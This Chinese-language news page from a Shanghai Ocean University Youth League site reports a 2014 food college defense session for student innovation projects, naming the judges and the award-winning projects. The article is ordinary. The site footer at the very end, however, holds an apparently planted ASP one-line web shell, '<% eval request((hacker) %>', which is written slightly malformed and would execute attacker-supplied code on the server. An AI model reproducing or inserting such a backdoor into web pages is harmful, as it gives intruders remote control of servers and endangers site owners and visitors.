当前位置:共青团上海海洋大学委员会 >> 新闻中心 >> 学院动态 >> 正文  
站内信息搜索:
食品学院举办2014年大学生创新计划项目结题答辩会
[2014年04月02日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    3月25日下午,2014年食品学院大学生创新项目结题答辩会举行。此次答辩会共有45个项目组参与答辩,食品学院吴文惠教授、杨福馨教授、包斌副教授、刘立平副教授、施文正副教授以及科创管理员张亚琼老师担任评委。

获奖选手颁奖

    答辩中,每组选手针对自己项目的创新点、可行性及市场前景进行了介绍,并就评委老师提出的问题进行了详细解答。答辩会现场气氛活跃。此次答辩历时五小时。最终,童雨舟负责的《热泵在浴室余温中的利用》和曹艳彦负责的《混合凝胶体系在可溶性冻蜂蜜中的研究及应用》创新项目得了评委老师们的一致好评荣获结题一等奖; 《夏季防虫解暑艾草薄荷凉席》等四个项目荣获二等奖;《寝室吊扇利用率最大化》、《豆渣的综合利用及其方便食品的研发》等六项荣获三等奖。

作品展示

    科创项目旨在培养同学的创新能力、研究探索能力,并对学生予以一定的资金支持,鼓励同学们积极进行科学探索和创新,以展现当代大学生对于科学的钻研精神,更体现出同学们不怕困难勇于挑战的可贵品质。希望有更多的同学可以参与到科创中来并有所收获。

 

关闭窗口

上一篇:《 中国渔业报 》:我国罗非鱼国际市场评级升级背后的故事

下一篇:上海市渔政管理监督处来校交流座谈
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>